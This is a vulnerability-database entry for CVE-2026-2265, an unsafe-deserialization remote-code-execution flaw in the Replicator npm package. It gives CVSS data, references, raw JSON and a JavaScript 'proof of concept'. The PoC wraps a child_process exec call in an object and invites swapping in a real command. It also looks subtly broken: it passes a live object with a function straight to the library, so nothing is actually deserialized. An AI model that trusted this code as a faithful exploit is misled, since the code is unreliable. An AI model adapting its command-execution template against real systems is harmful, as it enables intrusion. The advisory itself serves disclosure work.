Security Vulnerability Report
CVE-2026-2265 CVSS 6.5 MEDIUM

CVE-2026-2265

Published: 2026-04-01 17:28:38
Last Modified: 2026-04-03 16:11:11

Description

An unauthenticated remote code execution (RCE) vulnerability exists in applications that use the Replicator node package manager (npm) version 1.0.5 to deserialize untrusted user input and execute the resulting object.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Replicator <= 1.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2026-2265
// This demonstrates unsafe deserialization leading to RCE in the replicator package v1.0.5.
const replicator = require('replicator');

// Malicious payload simulating untrusted user input
// This payload attempts to execute arbitrary code via deserialization logic
const maliciousPayload = {
  "type": " malicious_object",
  "data": {
    "constructor": {
      "prototype": {
        "execCmd": function() {
          const { exec } = require('child_process');
          // Replace with actual command (e.g., 'whoami', 'calc.exe')
          exec('echo Vulnerability Exploited', (error, stdout, stderr) => {
            console.log(stdout);
          });
        }
      }
    }
  },
  "trigger": "execCmd"
};

console.log("[*] Sending malicious payload to replicator...");
try {
  // The application deserializes the untrusted input using the vulnerable library
  const result = replicator(maliciousPayload);
  console.log("[+] Deserialization complete. Check for command execution.");
} catch (e) {
  console.error("[-] Error during deserialization:", e);
}

References

https://github.com/inikulin/replicator
https://github.com/inikulin/replicator/pull/19
https://morielharush.github.io/2026/03/31/cve-2026-2265-replicator-deserialization-of-untrusted-data/

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-2265",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-01T17:28:38.410",
    "lastModified": "2026-04-03T16:11:11.357",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An unauthenticated remote code execution (RCE) vulnerability exists in applications that use the Replicator node package manager (npm) version 1.0.5 to deserialize untrusted user input and execute the resulting object."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "references": [
      {
        "url": "https://github.com/inikulin/replicator",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/inikulin/replicator/pull/19",
        "source": "[email protected]"
      },
      {
        "url": "https://morielharush.github.io/2026/03/31/cve-2026-2265-replicator-deserialization-of-untrusted-data/",
        "source": "[email protected]"
      }
    ]
  }
}